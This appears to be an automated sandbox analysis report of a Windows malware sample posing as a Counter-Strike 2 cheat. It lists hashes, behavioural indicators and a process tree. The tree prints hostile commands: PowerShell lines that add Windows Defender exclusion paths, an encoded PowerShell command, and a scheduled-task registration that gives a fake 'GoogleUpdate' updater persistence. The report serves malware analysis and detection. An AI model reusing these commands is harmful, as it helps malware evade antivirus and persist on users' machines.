Analysis
-
max time kernel
32s -
max time network
41s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
09/06/2024, 07:34
Static task
static1
Behavioral task
behavioral1
Sample
cs2.exe
Resource
win10-20240404-en
General
-
Target
cs2.exe
-
Size
5.9MB
-
MD5
e9211ee72f3b6b14423579889d7a8319
-
SHA1
f207d89647f7ce6311e2237a24185d45ce744d88
-
SHA256
4a43e95020312d2bc4725f469e6ba1fa66d164842584b916f24606350ab728f6
-
SHA512
1bf7366b2c56399f29452961dbd6b8af75ed668570f210c8f819ecd6126f7ee9e6bb8b5329436916b65417b9f20787f59c24e96fc07eb6ffb3fd3be20527b352
-
SSDEEP
98304:qgvNWGPzIo6XlhrXIHbr+61Q6JYAUGZKvrvXZu4Jc0LMAOWF+UicMjS0/Oo25RHH:qgvNW+Slir+IQ6JBULv7ZZrLnOW4b2nf
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
description pid Process procid_target PID 2948 created 3396 2948 conhost32.exe 54 PID 2948 created 3396 2948 conhost32.exe 54 PID 2948 created 3396 2948 conhost32.exe 54 PID 2948 created 3396 2948 conhost32.exe 54 PID 3156 created 3396 3156 updater.exe 54 PID 3156 created 3396 3156 updater.exe 54 PID 3156 created 3396 3156 updater.exe 54 -
pid Process 804 powershell.exe 4432 powershell.exe 2132 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 2948 conhost32.exe 4168 cs2-external-esp.exe 3156 updater.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 28 pastebin.com 18 raw.githubusercontent.com 19 raw.githubusercontent.com 27 pastebin.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2948 set thread context of 3456 2948 conhost32.exe 80 PID 3156 set thread context of 4900 3156 updater.exe 89 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 804 powershell.exe 804 powershell.exe 804 powershell.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 2948 conhost32.exe 2948 conhost32.exe 4432 powershell.exe 4432 powershell.exe 4432 powershell.exe 2948 conhost32.exe 2948 conhost32.exe 2948 conhost32.exe 2948 conhost32.exe 3456 dialer.exe 3456 dialer.exe 5108 powershell.exe 5108 powershell.exe 3456 dialer.exe 3456 dialer.exe 5108 powershell.exe 4168 cs2-external-esp.exe 4168 cs2-external-esp.exe 3456 dialer.exe 3456 dialer.exe 3456 dialer.exe 3456 dialer.exe 3456 dialer.exe 5108 powershell.exe 3456 dialer.exe 3456 dialer.exe 3456 dialer.exe 3456 dialer.exe 2948 conhost32.exe 2948 conhost32.exe 3456 dialer.exe 3456 dialer.exe 3456 dialer.exe 3456 dialer.exe 3456 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 804 powershell.exe Token: SeDebugPrivilege 4432 powershell.exe Token: SeIncreaseQuotaPrivilege 4432 powershell.exe Token: SeSecurityPrivilege 4432 powershell.exe Token: SeTakeOwnershipPrivilege 4432 powershell.exe Token: SeLoadDriverPrivilege 4432 powershell.exe Token: SeSystemProfilePrivilege 4432 powershell.exe Token: SeSystemtimePrivilege 4432 powershell.exe Token: SeProfSingleProcessPrivilege 4432 powershell.exe Token: SeIncBasePriorityPrivilege 4432 powershell.exe Token: SeCreatePagefilePrivilege 4432 powershell.exe Token: SeBackupPrivilege 4432 powershell.exe Token: SeRestorePrivilege 4432 powershell.exe Token: SeShutdownPrivilege 4432 powershell.exe Token: SeDebugPrivilege 4432 powershell.exe Token: SeSystemEnvironmentPrivilege 4432 powershell.exe Token: SeRemoteShutdownPrivilege 4432 powershell.exe Token: SeUndockPrivilege 4432 powershell.exe Token: SeManageVolumePrivilege 4432 powershell.exe Token: 33 4432 powershell.exe Token: 34 4432 powershell.exe Token: 35 4432 powershell.exe Token: 36 4432 powershell.exe Token: SeDebugPrivilege 3456 dialer.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeIncreaseQuotaPrivilege 5108 powershell.exe Token: SeSecurityPrivilege 5108 powershell.exe Token: SeTakeOwnershipPrivilege 5108 powershell.exe Token: SeLoadDriverPrivilege 5108 powershell.exe Token: SeSystemProfilePrivilege 5108 powershell.exe Token: SeSystemtimePrivilege 5108 powershell.exe Token: SeProfSingleProcessPrivilege 5108 powershell.exe Token: SeIncBasePriorityPrivilege 5108 powershell.exe Token: SeCreatePagefilePrivilege 5108 powershell.exe Token: SeBackupPrivilege 5108 powershell.exe Token: SeRestorePrivilege 5108 powershell.exe Token: SeShutdownPrivilege 5108 powershell.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeSystemEnvironmentPrivilege 5108 powershell.exe Token: SeRemoteShutdownPrivilege 5108 powershell.exe Token: SeUndockPrivilege 5108 powershell.exe Token: SeManageVolumePrivilege 5108 powershell.exe Token: 33 5108 powershell.exe Token: 34 5108 powershell.exe Token: 35 5108 powershell.exe Token: 36 5108 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2168 svchost.exe Token: SeIncreaseQuotaPrivilege 2168 svchost.exe Token: SeSecurityPrivilege 2168 svchost.exe Token: SeTakeOwnershipPrivilege 2168 svchost.exe Token: SeLoadDriverPrivilege 2168 svchost.exe Token: SeSystemtimePrivilege 2168 svchost.exe Token: SeBackupPrivilege 2168 svchost.exe Token: SeRestorePrivilege 2168 svchost.exe Token: SeShutdownPrivilege 2168 svchost.exe Token: SeSystemEnvironmentPrivilege 2168 svchost.exe Token: SeUndockPrivilege 2168 svchost.exe Token: SeManageVolumePrivilege 2168 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2168 svchost.exe Token: SeIncreaseQuotaPrivilege 2168 svchost.exe Token: SeSecurityPrivilege 2168 svchost.exe Token: SeTakeOwnershipPrivilege 2168 svchost.exe Token: SeLoadDriverPrivilege 2168 svchost.exe Token: SeSystemtimePrivilege 2168 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4236 wrote to memory of 804 4236 cs2.exe 72 PID 4236 wrote to memory of 804 4236 cs2.exe 72 PID 4236 wrote to memory of 804 4236 cs2.exe 72 PID 4236 wrote to memory of 2948 4236 cs2.exe 74 PID 4236 wrote to memory of 2948 4236 cs2.exe 74 PID 4236 wrote to memory of 4168 4236 cs2.exe 75 PID 4236 wrote to memory of 4168 4236 cs2.exe 75 PID 2948 wrote to memory of 3456 2948 conhost32.exe 80 PID 3456 wrote to memory of 584 3456 dialer.exe 5 PID 3456 wrote to memory of 640 3456 dialer.exe 7 PID 3456 wrote to memory of 736 3456 dialer.exe 10 PID 3456 wrote to memory of 908 3456 dialer.exe 13 PID 3456 wrote to memory of 1008 3456 dialer.exe 14 PID 3456 wrote to memory of 440 3456 dialer.exe 15 PID 3456 wrote to memory of 380 3456 dialer.exe 16 PID 3456 wrote to memory of 592 3456 dialer.exe 17 PID 3456 wrote to memory of 1092 3456 dialer.exe 19 PID 3456 wrote to memory of 1104 3456 dialer.exe 20 PID 3456 wrote to memory of 1204 3456 dialer.exe 21 PID 3456 wrote to memory of 1224 3456 dialer.exe 22 PID 3456 wrote to memory of 1240 3456 dialer.exe 23 PID 3456 wrote to memory of 1248 3456 dialer.exe 24 PID 3456 wrote to memory of 1408 3456 dialer.exe 25 PID 3456 wrote to memory of 1432 3456 dialer.exe 26 PID 3456 wrote to memory of 1456 3456 dialer.exe 27 PID 3456 wrote to memory of 1512 3456 dialer.exe 28 PID 3456 wrote to memory of 1560 3456 dialer.exe 29 PID 3456 wrote to memory of 1608 3456 dialer.exe 30 PID 3456 wrote to memory of 1640 3456 dialer.exe 31 PID 3456 wrote to memory of 1756 3456 dialer.exe 32 PID 3456 wrote to memory of 1764 3456 dialer.exe 33 PID 3456 wrote to memory of 1776 3456 dialer.exe 34 PID 3456 wrote to memory of 1816 3456 dialer.exe 35 PID 3456 wrote to memory of 1876 3456 dialer.exe 36 PID 3456 wrote to memory of 2012 3456 dialer.exe 37 PID 3456 wrote to memory of 1900 3456 dialer.exe 38 PID 3456 wrote to memory of 2168 3456 dialer.exe 39 PID 3456 wrote to memory of 2272 3456 dialer.exe 40 PID 3456 wrote to memory of 2504 3456 dialer.exe 41 PID 3456 wrote to memory of 2512 3456 dialer.exe 42 PID 3456 wrote to memory of 2620 3456 dialer.exe 43 PID 3456 wrote to memory of 2640 3456 dialer.exe 44 PID 3456 wrote to memory of 2652 3456 dialer.exe 45 PID 3456 wrote to memory of 2660 3456 dialer.exe 46 PID 3456 wrote to memory of 2708 3456 dialer.exe 47 PID 3456 wrote to memory of 2780 3456 dialer.exe 48 PID 3456 wrote to memory of 2788 3456 dialer.exe 49 PID 3456 wrote to memory of 2836 3456 dialer.exe 50 PID 3456 wrote to memory of 2884 3456 dialer.exe 51 PID 3456 wrote to memory of 3092 3456 dialer.exe 52 PID 3456 wrote to memory of 3112 3456 dialer.exe 53 PID 3456 wrote to memory of 3396 3456 dialer.exe 54 PID 3456 wrote to memory of 3944 3456 dialer.exe 57 PID 3456 wrote to memory of 3796 3456 dialer.exe 58 PID 3456 wrote to memory of 4964 3456 dialer.exe 60 PID 3456 wrote to memory of 1004 3456 dialer.exe 62 PID 3456 wrote to memory of 4296 3456 dialer.exe 63 PID 3456 wrote to memory of 3596 3456 dialer.exe 64 PID 3456 wrote to memory of 2100 3456 dialer.exe 65 PID 3456 wrote to memory of 1352 3456 dialer.exe 66 PID 3456 wrote to memory of 3892 3456 dialer.exe 67 PID 3456 wrote to memory of 436 3456 dialer.exe 68 PID 3456 wrote to memory of 4040 3456 dialer.exe 69 PID 3456 wrote to memory of 2948 3456 dialer.exe 74 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:584
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1008
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:640
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:736
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:908
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:440
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:380
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:592
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:1092 -
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2620
-
-
C:\Users\Admin\Google\Chrome\updater.exeC:\Users\Admin\Google\Chrome\updater.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3156
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵PID:1104
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1204
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1224
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1240
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1248
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1432
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1456
-
c:\windows\system32\sihost.exesihost.exe2⤵PID:2512
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1512
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1560
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1608
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1640
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1764
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1776
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1816
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1876
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2012
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:1900
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2272
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2504
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2640
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2652
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2660
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2708
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2780
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2788
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2836
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:2884
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:3092
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3112
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3396
-
C:\Users\Admin\AppData\Local\Temp\cs2.exe"C:\Users\Admin\AppData\Local\Temp\cs2.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAdgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAZwBiACMAPgA="3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:804
-
-
C:\Users\Admin\AppData\Local\conhost32.exe"C:\Users\Admin\AppData\Local\conhost32.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2948
-
-
C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe"C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4168 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3196
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jdikcdmvr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:316
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2380
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3384
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:2132
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:4900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jdikcdmvr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }2⤵PID:4376
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1524
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:3128
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:4912
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3944
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3796
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4964
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:1004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:4296
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:3596
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:2100
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1352
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵PID:3892
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵PID:436
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4040
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
18KB
MD584b947076ff79194bd2f2539c80d2fac
SHA1154b54aa34a1521d59d373bae20197426707d285
SHA256858af83202a048447e425f4d815fd8faadbe060aa0777c0c1743f577f7b9ff92
SHA512dd42a4187f5e806690aeb2f49734da7199e09f92f07125dd9b26aa2da2b8bb3b74db2b2fe3d2a83f75ab900731a1a1bc808923df80b1e239cd43b841499f701f
-
Filesize
1KB
MD54e36cd1fa1e00c532cb82880a8a6097d
SHA12d5a84ef221b0d5637fb854f68eef69d36065c15
SHA256f55e8fb411153ce462b5e7cbe4c2e362bb4a73dcaff6e2905aea6eab5a4fb8ca
SHA5124910cec0f2ea8c9b1490fa1d95369d97bf8ff80840454ecea0ed50d9427a421fdb5bc914c86a05f92574211a4c7a3f429acbfd950c6d8411ef6fa31fabd2a2e6
-
Filesize
1KB
MD51d2d913c3dc74c96a90c5f53810a4258
SHA12ec54878f305c68ff23a03c612563267704db95e
SHA25654d6b3b1c9dc258b5ffcdb51148e5c31131d5824d8ce43b78998c3a812b965e9
SHA5128a93c9b24aad835b7a10d8b511b5a8c07f19bcc426b1c15f1b5643822ccc1bdd045e2ea8fd3e5094c00320b9fe45b3cc70700e155992aaca4093c81e349e6853
-
Filesize
1KB
MD5bbb673277fae96ee4bc299672085e949
SHA1731ccb1581a06bff2ca36ca46b20c91c9adc468c
SHA25621a0a3c47eb15cec5d37688a67369836fda0164d0cd5afaa9a2aa52fb838685d
SHA512aa0efc1683991ed68027f0fbd1dfcf0616dd0c328bd015cb43987411e454e0583e8cc1a45bc9f689e873007071e0923d9be10a6db689ba268a167f856b6a8425
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
190KB
MD5dfae04e92d343bd110609b8194816131
SHA1d1b1f02cb02273f56eef010a52072f6c6a23f071
SHA256807999620cb4783d5c8f282cc21a6c5829e9f99719cbcdb7a71bdacd58671daa
SHA5126083ae949fef7c09102ac2d1fd6da30ec38b6044a9fe258a64ec07178cf5a180158a0fda32f76b76d14cff6653a8a17f8a5f15c747625be4a42fe015f48dc2fe
-
Filesize
5.7MB
MD50ca285f9a8c43016ffe109a13b0e07a0
SHA1a03f79912ab0fbfd10ee3ff67bff60671a8ad42f
SHA256880123a7fac24705ffb6795713d32fdc21679ac00802e72cb54d86814be4fcf1
SHA512b68ee3e6b8499ca4995390d8c614784d13629a326bbac0c9d258813723428cbd830021e68bd78f7ca7d8330c0eeb1b28405f29bb967349a205c98973086ef883